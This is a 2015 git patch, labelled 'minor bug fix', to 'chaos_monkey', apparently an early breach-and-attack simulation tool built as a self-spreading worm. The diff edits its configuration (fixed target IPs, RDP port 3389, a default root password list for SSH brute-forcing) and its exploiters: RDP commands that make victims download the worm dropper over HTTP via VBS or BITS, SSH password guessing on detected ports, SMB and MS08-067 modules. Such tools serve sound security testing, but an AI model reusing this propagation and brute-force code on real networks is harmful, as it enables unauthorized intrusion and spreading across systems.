From 73f9821ee4a9fec3354b0b961d6487461ed4801b Mon Sep 17 00:00:00 2001 From: Barak Hoffer Date: Wed, 30 Sep 2015 15:05:30 +0300 Subject: [PATCH] minor bug fix --- chaos_monkey/config.py | 11 +++++++---- chaos_monkey/exploit/rdpgrinder.py | 12 ++++++------ chaos_monkey/exploit/smbexec.py | 3 ++- chaos_monkey/exploit/sshexec.py | 15 ++++++++++++++- chaos_monkey/exploit/win_ms08_067.py | 1 + chaos_monkey/network/network_scanner.py | 9 +++++++-- chaos_monkey/network/sshfinger.py | 2 +- chaos_monkey/network/tools.py | 2 +- 8 files changed, 39 insertions(+), 16 deletions(-) diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py index 6ce461499..62f37338f 100644 --- a/chaos_monkey/config.py +++ b/chaos_monkey/config.py @@ -96,6 +96,8 @@ class Configuration(object): ### monkey config ########################### + alive = True + singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}" # how long to wait between scan iterations @@ -127,11 +129,11 @@ class Configuration(object): #range_class = RelativeRange range_size = 8 - range_class = ClassCRange - range_fixed = ("10.0.0.1") + range_class = FixedRange + range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87") # TCP Scanner - tcp_target_ports = [22, 445, 135] + tcp_target_ports = [22, 445, 135, 3389] tcp_scan_timeout = 1000 # 1000 Milliseconds tcp_scan_interval = 200 tcp_scan_get_banner = True @@ -157,6 +159,7 @@ class Configuration(object): ssh_user = "root" ssh_passwords = ["root", "toor", "1234", "12345678"] - alive = True + #rdp exploiter + rdp_use_vbs_download = True WormConfiguration = Configuration() \ No newline at end of file diff --git a/chaos_monkey/exploit/rdpgrinder.py b/chaos_monkey/exploit/rdpgrinder.py index 6a942c96c..7f9ac0d51 100644 --- a/chaos_monkey/exploit/rdpgrinder.py +++ b/chaos_monkey/exploit/rdpgrinder.py @@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail from logging import getLogger from exploit import HostExploiter from exploit.tools import HTTPTools -from model import RDP_CMDLINE_HTTP_BITS +from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS from model.host import VictimHost from network.tools import check_port_tcp from exploit.tools import get_target_monkey @@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter): # create server for http download. http_path, http_thread = HTTPTools.create_transfer(host, src_path) - command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path} + if self._config.rdp_use_vbs_download: + command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path} + else: + command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path} passwords = list(self._config.psexec_passwords[:]) known_password = host.get_credentials(self._config.psexec_user) @@ -288,10 +291,7 @@ class RdpExploiter(HostExploiter): if not exploited: LOG.debug("Exploiter RdpGrinder failed, rdp failed.") return False - elif http_thread.downloads == 0: - LOG.info("Trying rdp logging into victim %r with user" - " %s and password '%s'", host, - self._config.psexec_user, password) + elif http_thread.downloads == 0: LOG.debug("Exploiter RdpGrinder failed, http download failed.") return False diff --git a/chaos_monkey/exploit/smbexec.py b/chaos_monkey/exploit/smbexec.py index 15f81b471..dfa903197 100644 --- a/chaos_monkey/exploit/smbexec.py +++ b/chaos_monkey/exploit/smbexec.py @@ -3,6 +3,7 @@ from logging import getLogger from model.host import VictimHost from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED from exploit import HostExploiter +from network.tools import check_port_tcp from exploit.tools import SmbTools, get_target_monkey from network import SMBFinger @@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter): is_nb_open,_ = check_port_tcp(host.ip_addr, 139) if is_nb_open: host.os['type'] = 'windows' - return super(HostExploiter, self).is_os_supported(host) + return host.os.get('type') in self._target_os_type return False def exploit_host(self, host, src_path=None): diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py index 3c0bbf085..0230717d2 100644 --- a/chaos_monkey/exploit/sshexec.py +++ b/chaos_monkey/exploit/sshexec.py @@ -5,10 +5,12 @@ import logging from exploit import HostExploiter from model import MONKEY_ARG from exploit.tools import get_target_monkey +from network.tools import check_port_tcp __author__ = 'hoffer' LOG = logging.getLogger(__name__) +SSH_PORT = 22 class SSHExploiter(HostExploiter): _target_os_type = ['linux', None] @@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) + port = SSH_PORT + for servkey,servdata in host.services.items(): + if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'): + port = int(servkey.replace('tcp-','')) + + is_open,_ = check_port_tcp(host.ip_addr, port) + if not is_open: + LOG.info("SSH port is closed on %r, skipping", host) + return False + passwords = list(self._config.ssh_passwords[:]) known_password = host.get_credentials(self._config.ssh_user) if known_password is not None: @@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter): try: ssh.connect(host.ip_addr, username=self._config.ssh_user, - password=password) + password=password, + port=port) LOG.debug("Successfully logged in %r using SSH (%s : %s)", host, self._config.ssh_user, password) diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index 82eae5218..e3f48ceb4 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py @@ -15,6 +15,7 @@ from model.host import VictimHost from model import DROPPER_CMDLINE, MONKEY_CMDLINE from exploit import HostExploiter from exploit.tools import SmbTools, get_target_monkey +from network.tools import check_port_tcp try: from impacket import smb diff --git a/chaos_monkey/network/network_scanner.py b/chaos_monkey/network/network_scanner.py index c6f3bfa27..9e05a6222 100644 --- a/chaos_monkey/network/network_scanner.py +++ b/chaos_monkey/network/network_scanner.py @@ -5,6 +5,7 @@ import logging from network import HostScanner from config import WormConfiguration from info import local_ips +from network.range import * __author__ = 'itamar' @@ -26,8 +27,12 @@ class NetworkScanner(object): LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses) - self._ranges = [WormConfiguration.range_class(ip_address) - for ip_address in self._ip_addresses] + # for fixed range, only scan once. + if WormConfiguration.range_class is FixedRange: + self._ranges = [WormConfiguration.range_class('0.0.0.0')] + else: + self._ranges = [WormConfiguration.range_class(ip_address) + for ip_address in self._ip_addresses] LOG.info("Base local networks to scan are: %r", self._ranges) diff --git a/chaos_monkey/network/sshfinger.py b/chaos_monkey/network/sshfinger.py index c86dccda7..ddb90bc19 100644 --- a/chaos_monkey/network/sshfinger.py +++ b/chaos_monkey/network/sshfinger.py @@ -13,7 +13,7 @@ from model.host import VictimHost SSH_PORT = 22 SSH_SERVICE = 'tcp-22' SSH_REGEX = 'SSH-\d\.\d-OpenSSH' -TIMEOUT = 30 +TIMEOUT = 10 BANNER_READ = 1024 LINUX_DIST_SSH = ['ubuntu', 'debian'] diff --git a/chaos_monkey/network/tools.py b/chaos_monkey/network/tools.py index c415bd9a7..9e945924d 100644 --- a/chaos_monkey/network/tools.py +++ b/chaos_monkey/network/tools.py @@ -1,7 +1,7 @@ import socket import select -DEFAULT_TIMEOUT = 30 +DEFAULT_TIMEOUT = 10 BANNER_READ = 1024 def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):